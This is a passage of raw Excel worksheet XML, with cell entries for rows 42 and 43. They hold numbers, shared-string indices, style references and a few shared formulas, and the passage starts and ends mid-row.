      <c r="IE42" s="116">
        <v>0</v>
      </c>
      <c r="IF42" s="250">
        <v>0</v>
      </c>
      <c r="IG42" s="251">
        <v>0</v>
      </c>
      <c r="IH42" s="505">
        <v>0</v>
      </c>
      <c r="II42" s="252">
        <v>0</v>
      </c>
      <c r="IJ42" s="252">
        <v>0</v>
      </c>
      <c r="IK42" s="253">
        <v>0</v>
      </c>
      <c r="IL42" s="101">
        <v>0</v>
      </c>
      <c r="IM42" s="102">
        <v>0</v>
      </c>
      <c r="IN42" s="102">
        <v>0</v>
      </c>
      <c r="IO42" s="103">
        <v>0</v>
      </c>
      <c r="IP42" s="103">
        <v>0</v>
      </c>
      <c r="IQ42" s="104">
        <v>0</v>
      </c>
      <c r="IR42" s="105">
        <v>0</v>
      </c>
      <c r="IS42" s="106">
        <v>0</v>
      </c>
      <c r="IT42" s="497">
        <v>0</v>
      </c>
      <c r="IU42" s="107">
        <v>0</v>
      </c>
      <c r="IV42" s="107">
        <v>0</v>
      </c>
      <c r="IW42" s="108">
        <v>0</v>
      </c>
      <c r="IX42" s="109">
        <v>0</v>
      </c>
      <c r="IY42" s="110">
        <v>0</v>
      </c>
      <c r="IZ42" s="501">
        <v>0</v>
      </c>
      <c r="JA42" s="111">
        <v>0</v>
      </c>
      <c r="JB42" s="111">
        <v>0</v>
      </c>
      <c r="JC42" s="112">
        <v>0</v>
      </c>
      <c r="JD42" s="113">
        <v>0</v>
      </c>
      <c r="JE42" s="114">
        <v>0</v>
      </c>
      <c r="JF42" s="503">
        <v>0</v>
      </c>
      <c r="JG42" s="115">
        <v>0</v>
      </c>
      <c r="JH42" s="115">
        <v>0</v>
      </c>
      <c r="JI42" s="116">
        <v>0</v>
      </c>
      <c r="JJ42" s="101">
        <v>0</v>
      </c>
      <c r="JK42" s="102">
        <v>0</v>
      </c>
      <c r="JL42" s="102">
        <v>0</v>
      </c>
      <c r="JM42" s="103">
        <v>0</v>
      </c>
      <c r="JN42" s="103">
        <v>0</v>
      </c>
      <c r="JO42" s="104">
        <v>0</v>
      </c>
      <c r="JP42" s="105">
        <v>0</v>
      </c>
      <c r="JQ42" s="106">
        <v>0</v>
      </c>
      <c r="JR42" s="497">
        <v>0</v>
      </c>
      <c r="JS42" s="107">
        <v>0</v>
      </c>
      <c r="JT42" s="107">
        <v>0</v>
      </c>
      <c r="JU42" s="108">
        <v>0</v>
      </c>
      <c r="JV42" s="109">
        <v>0</v>
      </c>
      <c r="JW42" s="110">
        <v>0</v>
      </c>
      <c r="JX42" s="501">
        <v>0</v>
      </c>
      <c r="JY42" s="111">
        <v>0</v>
      </c>
      <c r="JZ42" s="111">
        <v>0</v>
      </c>
      <c r="KA42" s="112">
        <v>0</v>
      </c>
      <c r="KB42" s="113">
        <v>0</v>
      </c>
      <c r="KC42" s="114">
        <v>0</v>
      </c>
      <c r="KD42" s="503">
        <v>0</v>
      </c>
      <c r="KE42" s="115">
        <v>0</v>
      </c>
      <c r="KF42" s="115">
        <v>0</v>
      </c>
      <c r="KG42" s="116">
        <v>0</v>
      </c>
      <c r="KH42" s="250">
        <v>0</v>
      </c>
      <c r="KI42" s="251">
        <v>0</v>
      </c>
      <c r="KJ42" s="505">
        <v>0</v>
      </c>
      <c r="KK42" s="252">
        <v>0</v>
      </c>
      <c r="KL42" s="252">
        <v>0</v>
      </c>
      <c r="KM42" s="253">
        <v>0</v>
      </c>
      <c r="KN42" s="101">
        <v>0</v>
      </c>
      <c r="KO42" s="102">
        <v>0</v>
      </c>
      <c r="KP42" s="102">
        <v>0</v>
      </c>
      <c r="KQ42" s="103">
        <v>0</v>
      </c>
      <c r="KR42" s="103">
        <v>0</v>
      </c>
      <c r="KS42" s="104">
        <v>0</v>
      </c>
      <c r="KT42" s="105">
        <v>0</v>
      </c>
      <c r="KU42" s="106">
        <v>0</v>
      </c>
      <c r="KV42" s="497">
        <v>0</v>
      </c>
      <c r="KW42" s="107">
        <v>0</v>
      </c>
      <c r="KX42" s="107">
        <v>0</v>
      </c>
      <c r="KY42" s="108">
        <v>0</v>
      </c>
      <c r="KZ42" s="109">
        <v>0</v>
      </c>
      <c r="LA42" s="110">
        <v>0</v>
      </c>
      <c r="LB42" s="501">
        <v>0</v>
      </c>
      <c r="LC42" s="111">
        <v>0</v>
      </c>
      <c r="LD42" s="111">
        <v>0</v>
      </c>
      <c r="LE42" s="112">
        <v>0</v>
      </c>
      <c r="LF42" s="113">
        <v>0</v>
      </c>
      <c r="LG42" s="114">
        <v>0</v>
      </c>
      <c r="LH42" s="503">
        <v>0</v>
      </c>
      <c r="LI42" s="115">
        <v>0</v>
      </c>
      <c r="LJ42" s="115">
        <v>0</v>
      </c>
      <c r="LK42" s="116">
        <v>0</v>
      </c>
      <c r="LL42" s="117">
        <v>2</v>
      </c>
      <c r="LM42" s="507">
        <v>2</v>
      </c>
      <c r="LN42" s="119">
        <v>1</v>
      </c>
      <c r="LO42" s="119">
        <v>1</v>
      </c>
      <c r="LP42" s="119">
        <v>1</v>
      </c>
      <c r="LQ42" s="119">
        <v>1</v>
      </c>
      <c r="LR42" s="119">
        <v>1</v>
      </c>
      <c r="LS42" s="119">
        <v>1</v>
      </c>
      <c r="LT42" s="382"/>
      <c r="LU42" s="117">
        <v>0</v>
      </c>
      <c r="LV42" s="118">
        <v>0</v>
      </c>
      <c r="LW42" s="507">
        <v>0</v>
      </c>
      <c r="LX42" s="119">
        <v>0</v>
      </c>
      <c r="LY42" s="119">
        <v>0</v>
      </c>
      <c r="LZ42" s="119">
        <v>0</v>
      </c>
      <c r="MA42" s="117">
        <v>0</v>
      </c>
      <c r="MB42" s="118">
        <v>0</v>
      </c>
      <c r="MC42" s="507">
        <v>0</v>
      </c>
      <c r="MD42" s="119">
        <v>0</v>
      </c>
      <c r="ME42" s="119">
        <v>0</v>
      </c>
      <c r="MF42" s="119">
        <v>0</v>
      </c>
      <c r="MG42" s="117">
        <v>0</v>
      </c>
      <c r="MH42" s="118">
        <v>0</v>
      </c>
      <c r="MI42" s="507">
        <v>0</v>
      </c>
      <c r="MJ42" s="119">
        <v>0</v>
      </c>
      <c r="MK42" s="119">
        <v>0</v>
      </c>
      <c r="ML42" s="119">
        <v>0</v>
      </c>
      <c r="MM42" s="117">
        <v>1</v>
      </c>
      <c r="MN42" s="118" t="s">
        <v>4213</v>
      </c>
      <c r="MO42" s="507">
        <v>1</v>
      </c>
      <c r="MP42" s="119" t="s">
        <v>3118</v>
      </c>
      <c r="MQ42" s="119">
        <v>1</v>
      </c>
      <c r="MR42" s="119">
        <v>1</v>
      </c>
      <c r="MS42" s="117">
        <v>0</v>
      </c>
      <c r="MT42" s="118">
        <v>0</v>
      </c>
      <c r="MU42" s="507">
        <v>0</v>
      </c>
      <c r="MV42" s="119">
        <v>0</v>
      </c>
      <c r="MW42" s="119">
        <v>0</v>
      </c>
      <c r="MX42" s="119">
        <v>0</v>
      </c>
      <c r="MY42" s="117">
        <v>0</v>
      </c>
      <c r="MZ42" s="118">
        <v>0</v>
      </c>
      <c r="NA42" s="507">
        <v>0</v>
      </c>
      <c r="NB42" s="119">
        <v>0</v>
      </c>
      <c r="NC42" s="119">
        <v>0</v>
      </c>
      <c r="ND42" s="119">
        <v>0</v>
      </c>
      <c r="NE42" s="117">
        <v>0</v>
      </c>
      <c r="NF42" s="118">
        <v>0</v>
      </c>
      <c r="NG42" s="507">
        <v>0</v>
      </c>
      <c r="NH42" s="119">
        <v>0</v>
      </c>
      <c r="NI42" s="119">
        <v>0</v>
      </c>
      <c r="NJ42" s="119">
        <v>0</v>
      </c>
      <c r="NK42" s="117">
        <v>1</v>
      </c>
      <c r="NL42" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM42" s="507">
        <v>1</v>
      </c>
      <c r="NN42" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO42" s="119">
        <v>1</v>
      </c>
      <c r="NP42" s="119">
        <v>1</v>
      </c>
      <c r="NQ42" s="117">
        <v>0</v>
      </c>
      <c r="NR42" s="118">
        <v>0</v>
      </c>
      <c r="NS42" s="507">
        <v>0</v>
      </c>
      <c r="NT42" s="119">
        <v>0</v>
      </c>
      <c r="NU42" s="119">
        <v>0</v>
      </c>
      <c r="NV42" s="119">
        <v>0</v>
      </c>
      <c r="NW42" s="117">
        <v>0</v>
      </c>
      <c r="NX42" s="118">
        <v>0</v>
      </c>
      <c r="NY42" s="507">
        <v>0</v>
      </c>
      <c r="NZ42" s="119">
        <v>0</v>
      </c>
      <c r="OA42" s="119">
        <v>0</v>
      </c>
      <c r="OB42" s="119">
        <v>0</v>
      </c>
      <c r="OC42" s="120">
        <v>0</v>
      </c>
      <c r="OD42" s="120">
        <v>0</v>
      </c>
      <c r="OE42" s="120">
        <v>0</v>
      </c>
      <c r="OF42" s="121">
        <v>0</v>
      </c>
      <c r="OG42" s="120">
        <v>0</v>
      </c>
      <c r="OH42" s="120">
        <v>0</v>
      </c>
      <c r="OI42" s="120">
        <v>0</v>
      </c>
      <c r="OJ42" s="120">
        <v>0</v>
      </c>
      <c r="OK42" s="383"/>
      <c r="OL42" s="120">
        <v>0</v>
      </c>
      <c r="OM42" s="120">
        <v>0</v>
      </c>
      <c r="ON42" s="120">
        <v>0</v>
      </c>
      <c r="OO42" s="120"/>
      <c r="OP42" s="120">
        <v>0</v>
      </c>
      <c r="OQ42" s="464">
        <v>0</v>
      </c>
      <c r="OR42" s="120">
        <v>0</v>
      </c>
      <c r="OS42" s="120">
        <v>0</v>
      </c>
      <c r="OT42" s="120">
        <v>0</v>
      </c>
      <c r="OU42" s="120"/>
      <c r="OV42" s="120">
        <v>0</v>
      </c>
      <c r="OW42" s="464">
        <v>0</v>
      </c>
      <c r="OX42" s="120">
        <v>0</v>
      </c>
      <c r="OY42" s="120">
        <v>0</v>
      </c>
      <c r="OZ42" s="120">
        <v>0</v>
      </c>
      <c r="PA42" s="120"/>
      <c r="PB42" s="120">
        <v>0</v>
      </c>
      <c r="PC42" s="464">
        <v>0</v>
      </c>
      <c r="PD42" s="120">
        <v>0</v>
      </c>
      <c r="PE42" s="120">
        <v>0</v>
      </c>
      <c r="PF42" s="120">
        <v>0</v>
      </c>
      <c r="PG42" s="120"/>
      <c r="PH42" s="120">
        <v>0</v>
      </c>
      <c r="PI42" s="464">
        <v>0</v>
      </c>
      <c r="PJ42" s="120">
        <v>0</v>
      </c>
      <c r="PK42" s="120">
        <v>0</v>
      </c>
      <c r="PL42" s="120">
        <v>0</v>
      </c>
      <c r="PM42" s="120"/>
      <c r="PN42" s="120">
        <v>0</v>
      </c>
      <c r="PO42" s="464">
        <v>0</v>
      </c>
      <c r="PP42" s="120">
        <v>0</v>
      </c>
      <c r="PQ42" s="120">
        <v>0</v>
      </c>
      <c r="PR42" s="120">
        <v>0</v>
      </c>
      <c r="PS42" s="120"/>
      <c r="PT42" s="120">
        <v>0</v>
      </c>
      <c r="PU42" s="464">
        <v>0</v>
      </c>
      <c r="PV42" s="120">
        <v>0</v>
      </c>
      <c r="PW42" s="120">
        <v>0</v>
      </c>
      <c r="PX42" s="120">
        <v>0</v>
      </c>
      <c r="PY42" s="120"/>
      <c r="PZ42" s="120">
        <v>0</v>
      </c>
      <c r="QA42" s="464">
        <v>0</v>
      </c>
      <c r="QB42" s="120">
        <v>0</v>
      </c>
      <c r="QC42" s="120">
        <v>0</v>
      </c>
      <c r="QD42" s="120">
        <v>0</v>
      </c>
      <c r="QE42" s="120"/>
      <c r="QF42" s="120">
        <v>0</v>
      </c>
      <c r="QG42" s="464">
        <v>0</v>
      </c>
      <c r="QH42" s="120">
        <v>0</v>
      </c>
      <c r="QI42" s="120">
        <v>0</v>
      </c>
      <c r="QJ42" s="120">
        <v>0</v>
      </c>
      <c r="QK42" s="120"/>
      <c r="QL42" s="120">
        <v>0</v>
      </c>
      <c r="QM42" s="464">
        <v>0</v>
      </c>
      <c r="QN42" s="120">
        <v>0</v>
      </c>
      <c r="QO42" s="120">
        <v>0</v>
      </c>
      <c r="QP42" s="120">
        <v>0</v>
      </c>
      <c r="QQ42" s="120"/>
      <c r="QR42" s="120">
        <v>0</v>
      </c>
      <c r="QS42" s="464">
        <v>0</v>
      </c>
      <c r="QT42" s="184"/>
      <c r="QU42" s="184"/>
      <c r="QV42" s="184"/>
      <c r="QW42" s="184"/>
      <c r="QX42" s="184"/>
      <c r="QY42" s="184"/>
      <c r="QZ42" s="184"/>
      <c r="RA42" s="184"/>
      <c r="RB42" s="184"/>
      <c r="RC42" s="184"/>
      <c r="RD42" s="184"/>
      <c r="RE42" s="184"/>
      <c r="RF42" s="184"/>
      <c r="RG42" s="184"/>
      <c r="RH42" s="184"/>
      <c r="RI42" s="184"/>
      <c r="RJ42" s="184"/>
      <c r="RK42" s="184"/>
      <c r="RL42" s="184"/>
      <c r="RM42" s="184"/>
      <c r="RN42" s="184"/>
      <c r="RO42" s="184"/>
      <c r="RP42" s="184"/>
      <c r="RQ42" s="184"/>
      <c r="RR42" s="184"/>
      <c r="RS42" s="184"/>
      <c r="RT42" s="184"/>
      <c r="RU42" s="184"/>
      <c r="RV42" s="184"/>
      <c r="RW42" s="184"/>
      <c r="RX42" s="184"/>
      <c r="RY42" s="184"/>
      <c r="RZ42" s="184"/>
      <c r="SA42" s="184"/>
      <c r="SB42" s="184"/>
      <c r="SC42" s="184"/>
      <c r="SD42" s="184"/>
      <c r="SE42" s="184"/>
      <c r="SF42" s="184"/>
      <c r="SG42" s="184"/>
      <c r="SH42" s="184"/>
      <c r="SI42" s="184"/>
      <c r="SJ42" s="184"/>
      <c r="SK42" s="184"/>
      <c r="SL42" s="184"/>
      <c r="SM42" s="184"/>
      <c r="SN42" s="184"/>
      <c r="SO42" s="184"/>
      <c r="SP42" s="184"/>
      <c r="SQ42" s="184"/>
      <c r="SR42" s="184"/>
      <c r="SS42" s="184"/>
      <c r="ST42" s="184"/>
      <c r="SU42" s="184"/>
      <c r="SV42" s="184"/>
      <c r="SW42" s="184"/>
      <c r="SX42" s="184"/>
      <c r="SY42" s="184"/>
      <c r="SZ42" s="184"/>
      <c r="TA42" s="184"/>
      <c r="TB42" s="184"/>
      <c r="TC42" s="184"/>
      <c r="TD42" s="184"/>
      <c r="TE42" s="184"/>
      <c r="TF42" s="184"/>
      <c r="TG42" s="184"/>
      <c r="TH42" s="184"/>
      <c r="TI42" s="184"/>
      <c r="TJ42" s="184"/>
      <c r="TK42" s="184"/>
      <c r="TL42" s="184"/>
      <c r="TM42" s="184"/>
      <c r="TN42" s="184"/>
      <c r="TO42" s="184"/>
      <c r="TP42" s="184"/>
      <c r="TQ42" s="184"/>
      <c r="TR42" s="184"/>
      <c r="TS42" s="184"/>
      <c r="TT42" s="184"/>
      <c r="TU42" s="184"/>
      <c r="TV42" s="184"/>
      <c r="TW42" s="184"/>
      <c r="TX42" s="184"/>
      <c r="TY42" s="184"/>
      <c r="TZ42" s="184"/>
      <c r="UA42" s="184"/>
      <c r="UB42" s="184"/>
      <c r="UC42" s="184"/>
      <c r="UD42" s="184"/>
      <c r="UE42" s="184"/>
      <c r="UF42" s="184"/>
      <c r="UG42" s="184"/>
      <c r="UH42" s="184"/>
      <c r="UI42" s="184"/>
      <c r="UJ42" s="184"/>
      <c r="UK42" s="184"/>
      <c r="UL42" s="184"/>
      <c r="UM42" s="184"/>
      <c r="UN42" s="184"/>
      <c r="UO42" s="184"/>
      <c r="UP42" s="184"/>
      <c r="UQ42" s="184"/>
      <c r="UR42" s="184"/>
      <c r="US42" s="184"/>
      <c r="UT42" s="184"/>
      <c r="UU42" s="184"/>
      <c r="UV42" s="184"/>
      <c r="UW42" s="184"/>
      <c r="UX42" s="184"/>
      <c r="UY42" s="184"/>
      <c r="UZ42" s="184"/>
      <c r="VA42" s="184"/>
      <c r="VB42" s="184"/>
      <c r="VC42" s="184"/>
      <c r="VD42" s="184"/>
      <c r="VE42" s="184"/>
      <c r="VF42" s="184"/>
      <c r="VG42" s="184"/>
      <c r="VH42" s="184"/>
      <c r="VI42" s="184"/>
      <c r="VJ42" s="184"/>
      <c r="VK42" s="184"/>
      <c r="VL42" s="184"/>
      <c r="VM42" s="184"/>
      <c r="VN42" s="184"/>
      <c r="VO42" s="184"/>
      <c r="VP42" s="184"/>
      <c r="VQ42" s="184"/>
      <c r="VR42" s="184"/>
      <c r="VS42" s="184"/>
      <c r="VT42" s="184"/>
      <c r="VU42" s="184"/>
      <c r="VV42" s="184"/>
      <c r="VW42" s="184"/>
      <c r="VX42" s="184"/>
      <c r="VY42" s="184"/>
    </row>
    <row r="43" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A43" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B43" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C43" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D43" s="83" t="s">
        <v>80</v>
      </c>
      <c r="E43" s="83">
        <f t="shared" si="2"/>
        <v>32</v>
      </c>
      <c r="F43" s="83" t="s">
        <v>81</v>
      </c>
      <c r="G43" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H43" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I43" s="81" t="s">
        <v>1115</v>
      </c>
      <c r="J43" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K43" s="81" t="s">
        <v>1130</v>
      </c>
      <c r="L43" s="81" t="s">
        <v>1138</v>
      </c>
      <c r="M43" s="378" t="s">
        <v>215</v>
      </c>
      <c r="N43" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O43" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P43" s="91"/>
      <c r="Q43" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R43" s="92" t="s">
        <v>1132</v>
      </c>
      <c r="S43" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T43" s="92" t="s">
        <v>1133</v>
      </c>
      <c r="U43" s="94" t="s">
        <v>1134</v>
      </c>
      <c r="V43" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W43" s="96" t="s">
        <v>1120</v>
      </c>
      <c r="X43" s="97" t="s">
        <v>1135</v>
      </c>
      <c r="Y43" s="83" t="s">
        <v>1136</v>
      </c>
      <c r="Z43" s="98" t="s">
        <v>1137</v>
      </c>
      <c r="AA43" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB43" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC43" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD43" s="83"/>
      <c r="AE43" s="83"/>
      <c r="AF43" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG43" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH43" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI43" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ43" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK43" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL43" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM43" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN43" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO43" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP43" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ43" s="358">
        <v>1</v>
      </c>
      <c r="AR43" s="100"/>
      <c r="AS43" s="100">
        <v>1</v>
      </c>
      <c r="AT43" s="100">
        <v>0</v>
      </c>
      <c r="AU43" s="100">
        <v>1</v>
      </c>
      <c r="AV43" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW43" s="100">
        <v>1</v>
      </c>
      <c r="AX43" s="100">
        <v>1</v>
      </c>
      <c r="AY43" s="100">
        <v>0</v>
      </c>
      <c r="AZ43" s="100">
        <v>1</v>
      </c>
      <c r="BA43" s="381"/>
      <c r="BB43" s="101">
        <v>2</v>
      </c>
      <c r="BC43" s="102" t="s">
        <v>1807</v>
      </c>
      <c r="BD43" s="102">
        <v>2</v>
      </c>
      <c r="BE43" s="103" t="s">
        <v>1808</v>
      </c>
      <c r="BF43" s="103">
        <v>2</v>
      </c>
      <c r="BG43" s="104">
        <v>1</v>
      </c>
      <c r="BH43" s="105">
        <v>2</v>
      </c>
      <c r="BI43" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="BJ43" s="497">
        <v>2</v>
      </c>
      <c r="BK43" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="BL43" s="107">
        <v>2</v>
      </c>
      <c r="BM43" s="108">
        <v>1</v>
      </c>
      <c r="BN43" s="109">
        <v>4</v>
      </c>
      <c r="BO43" s="110" t="s">
        <v>2008</v>
      </c>
      <c r="BP43" s="501">
        <v>4</v>
      </c>
      <c r="BQ43" s="111" t="s">
        <v>2009</v>
      </c>
      <c r="BR43" s="111">
        <v>4</v>
      </c>
      <c r="BS43" s="112">
        <v>1</v>
      </c>
      <c r="BT43" s="113">
        <v>7</v>
      </c>
      <c r="BU43" s="114" t="s">
        <v>1898</v>
      </c>
      <c r="BV43" s="503">
        <v>7</v>
      </c>
      <c r="BW43" s="115" t="s">
        <v>1899</v>
      </c>
      <c r="BX43" s="115">
        <v>7</v>
      </c>
      <c r="BY43" s="116">
        <v>1</v>
      </c>
      <c r="BZ43" s="250">
        <v>8</v>
      </c>
      <c r="CA43" s="251" t="s">
        <v>4480</v>
      </c>
      <c r="CB43" s="505">
        <v>5</v>
      </c>
      <c r="CC43" s="252" t="s">
        <v>4481</v>
      </c>
      <c r="CD43" s="252">
        <v>5</v>
      </c>
      <c r="CE43" s="253">
        <v>1</v>
      </c>
      <c r="CF43" s="101">
        <v>14</v>
      </c>
      <c r="CG43" s="102" t="s">
        <v>2096</v>
      </c>
      <c r="CH43" s="102">
        <v>12</v>
      </c>
      <c r="CI43" s="103" t="s">
        <v>2097</v>
      </c>
      <c r="CJ43" s="103">
        <v>12</v>
      </c>
      <c r="CK43" s="104">
        <v>1</v>
      </c>
      <c r="CL43" s="105">
        <v>0</v>
      </c>
      <c r="CM43" s="106">
        <v>0</v>
      </c>
      <c r="CN43" s="497">
        <v>0</v>
      </c>
      <c r="CO43" s="107">
        <v>0</v>
      </c>
      <c r="CP43" s="107">
        <v>0</v>
      </c>
      <c r="CQ43" s="108">
        <v>0</v>
      </c>
      <c r="CR43" s="109">
        <v>1</v>
      </c>
      <c r="CS43" s="110" t="s">
        <v>1943</v>
      </c>
      <c r="CT43" s="501">
        <v>1</v>
      </c>
      <c r="CU43" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="CV43" s="111">
        <v>1</v>
      </c>
      <c r="CW43" s="112">
        <v>1</v>
      </c>
      <c r="CX43" s="113">
        <v>5</v>
      </c>
      <c r="CY43" s="114" t="s">
        <v>2151</v>
      </c>
      <c r="CZ43" s="503">
        <v>5</v>
      </c>
      <c r="DA43" s="115" t="s">
        <v>2152</v>
      </c>
      <c r="DB43" s="115">
        <v>5</v>
      </c>
      <c r="DC43" s="116">
        <v>1</v>
      </c>
      <c r="DD43" s="101">
        <v>1</v>
      </c>
      <c r="DE43" s="102" t="s">
        <v>1809</v>
      </c>
      <c r="DF43" s="102">
        <v>1</v>
      </c>
      <c r="DG43" s="103" t="s">
        <v>1810</v>
      </c>
      <c r="DH43" s="103">
        <v>1</v>
      </c>
      <c r="DI43" s="104">
        <v>1</v>
      </c>
      <c r="DJ43" s="105">
        <v>0</v>
      </c>
      <c r="DK43" s="106">
        <v>0</v>
      </c>
      <c r="DL43" s="497">
        <v>0</v>
      </c>
      <c r="DM43" s="107">
        <v>0</v>
      </c>
      <c r="DN43" s="107">
        <v>0</v>
      </c>
      <c r="DO43" s="108">
        <v>0</v>
      </c>
      <c r="DP43" s="109">
        <v>1</v>
      </c>
      <c r="DQ43" s="110" t="s">
        <v>1809</v>
      </c>
      <c r="DR43" s="501">
        <v>1</v>
      </c>
      <c r="DS43" s="111" t="s">
        <v>1810</v>
      </c>
      <c r="DT43" s="111">
        <v>1</v>
      </c>
      <c r="DU43" s="112">
        <v>1</v>
      </c>
      <c r="DV43" s="113">
        <v>6</v>
      </c>
      <c r="DW43" s="114" t="s">
        <v>3123</v>
      </c>
      <c r="DX43" s="503">
        <v>6</v>
      </c>
      <c r="DY43" s="115" t="s">
        <v>3124</v>
      </c>
      <c r="DZ43" s="115">
        <v>6</v>
      </c>
      <c r="EA43" s="116">
        <v>1</v>
      </c>
      <c r="EB43" s="250">
        <v>0</v>
      </c>
      <c r="EC43" s="251">
        <v>0</v>
      </c>
      <c r="ED43" s="505">
        <v>0</v>
      </c>
      <c r="EE43" s="252">
        <v>0</v>
      </c>
      <c r="EF43" s="252">
        <v>0</v>
      </c>
      <c r="EG43" s="253">
        <v>0</v>
      </c>
      <c r="EH43" s="101">
        <v>6</v>
      </c>
      <c r="EI43" s="102" t="s">
        <v>3123</v>
      </c>
      <c r="EJ43" s="102">
        <v>6</v>
      </c>
      <c r="EK43" s="103" t="s">
        <v>3124</v>
      </c>
      <c r="EL43" s="103">
        <v>6</v>
      </c>
      <c r="EM43" s="104">
        <v>1</v>
      </c>
      <c r="EN43" s="105">
        <v>0</v>
      </c>
      <c r="EO43" s="106">
        <v>0</v>
      </c>
      <c r="EP43" s="497">
        <v>0</v>
      </c>
      <c r="EQ43" s="107">
        <v>0</v>
      </c>
      <c r="ER43" s="107">
        <v>0</v>
      </c>
      <c r="ES43" s="108">
        <v>0</v>
      </c>
      <c r="ET43" s="109">
        <v>1</v>
      </c>
      <c r="EU43" s="110" t="s">
        <v>1943</v>
      </c>
      <c r="EV43" s="501">
        <v>1</v>
      </c>
      <c r="EW43" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="EX43" s="111">
        <v>1</v>
      </c>
      <c r="EY43" s="112">
        <v>1</v>
      </c>
      <c r="EZ43" s="113">
        <v>2</v>
      </c>
      <c r="FA43" s="114" t="s">
        <v>3125</v>
      </c>
      <c r="FB43" s="503">
        <v>2</v>
      </c>
      <c r="FC43" s="115" t="s">
        <v>3126</v>
      </c>
      <c r="FD43" s="115">
        <v>2</v>
      </c>
      <c r="FE43" s="116">
        <v>1</v>
      </c>
      <c r="FF43" s="101">
        <v>1</v>
      </c>
      <c r="FG43" s="102" t="s">
        <v>3127</v>
      </c>
      <c r="FH43" s="102">
        <v>1</v>
      </c>
      <c r="FI43" s="103" t="s">
        <v>3128</v>
      </c>
      <c r="FJ43" s="103">
        <v>1</v>
      </c>
      <c r="FK43" s="104">
        <v>1</v>
      </c>
      <c r="FL43" s="105">
        <v>2</v>
      </c>
      <c r="FM43" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="FN43" s="497">
        <v>2</v>
      </c>
      <c r="FO43" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="FP43" s="107">
        <v>2</v>
      </c>
      <c r="FQ43" s="108">
        <v>1</v>
      </c>
      <c r="FR43" s="109">
        <v>3</v>
      </c>
      <c r="FS43" s="110" t="s">
        <v>3129</v>
      </c>
      <c r="FT43" s="501">
        <v>3</v>
      </c>
      <c r="FU43" s="111" t="s">
        <v>3130</v>
      </c>
      <c r="FV43" s="111">
        <v>3</v>
      </c>
      <c r="FW43" s="112">
        <v>1</v>
      </c>
      <c r="FX43" s="113">
        <v>1</v>
      </c>
      <c r="FY43" s="114" t="s">
        <v>3127</v>
      </c>
      <c r="FZ43" s="503">
        <v>1</v>
      </c>
      <c r="GA43" s="115" t="s">
        <v>3128</v>
      </c>
      <c r="GB43" s="115">
        <v>1</v>
      </c>
      <c r="GC43" s="116">
        <v>1</v>
      </c>
      <c r="GD43" s="250">
        <v>8</v>
      </c>
      <c r="GE43" s="251" t="s">
        <v>4480</v>
      </c>
      <c r="GF43" s="505">
        <v>5</v>
      </c>
      <c r="GG43" s="252" t="s">
        <v>4481</v>
      </c>
      <c r="GH43" s="252">
        <v>5</v>
      </c>
      <c r="GI43" s="253">
        <v>1</v>
      </c>
      <c r="GJ43" s="101">
        <v>8</v>
      </c>
      <c r="GK43" s="102" t="s">
        <v>3131</v>
      </c>
      <c r="GL43" s="102">
        <v>6</v>
      </c>
      <c r="GM43" s="103" t="s">
        <v>3132</v>
      </c>
      <c r="GN43" s="103">
        <v>6</v>
      </c>
      <c r="GO43" s="104">
        <v>1</v>
      </c>
      <c r="GP43" s="105">
        <v>0</v>
      </c>
      <c r="GQ43" s="106">
        <v>0</v>
      </c>
      <c r="GR43" s="497">
        <v>0</v>
      </c>
      <c r="GS43" s="107">
        <v>0</v>
      </c>
      <c r="GT43" s="107">
        <v>0</v>
      </c>
      <c r="GU43" s="108">
        <v>0</v>
      </c>
      <c r="GV43" s="109">
        <v>0</v>
      </c>
      <c r="GW43" s="110">
        <v>0</v>
      </c>
      <c r="GX43" s="501">
        <v>0</v>
      </c>
      <c r="GY43" s="111">
        <v>0</v>
      </c>
      <c r="GZ43" s="111">
        <v>0</v>
      </c>
      <c r="HA43" s="112">
        <v>0</v>
      </c>
      <c r="HB43" s="113">
        <v>3</v>
      </c>
      <c r="HC43" s="114" t="s">
        <v>3129</v>
      </c>
      <c r="HD43" s="503">
        <v>3</v>
      </c>
      <c r="HE43" s="115" t="s">
        <v>3130</v>
      </c>
      <c r="HF43" s="115">
        <v>3</v>
      </c>
      <c r="HG43" s="116">
        <v>1</v>
      </c>
      <c r="HH43" s="101">
        <v>0</v>
      </c>
      <c r="HI43" s="102">
        <v>0</v>
      </c>
      <c r="HJ43" s="102">
        <v>0</v>
      </c>
      <c r="HK43" s="103">
        <v>0</v>
      </c>
      <c r="HL43" s="103">
        <v>0</v>
      </c>
      <c r="HM43" s="104">
        <v>0</v>
      </c>
      <c r="HN43" s="105">
        <v>0</v>
      </c>
      <c r="HO43" s="106">
        <v>0</v>
      </c>
      <c r="HP43" s="497">
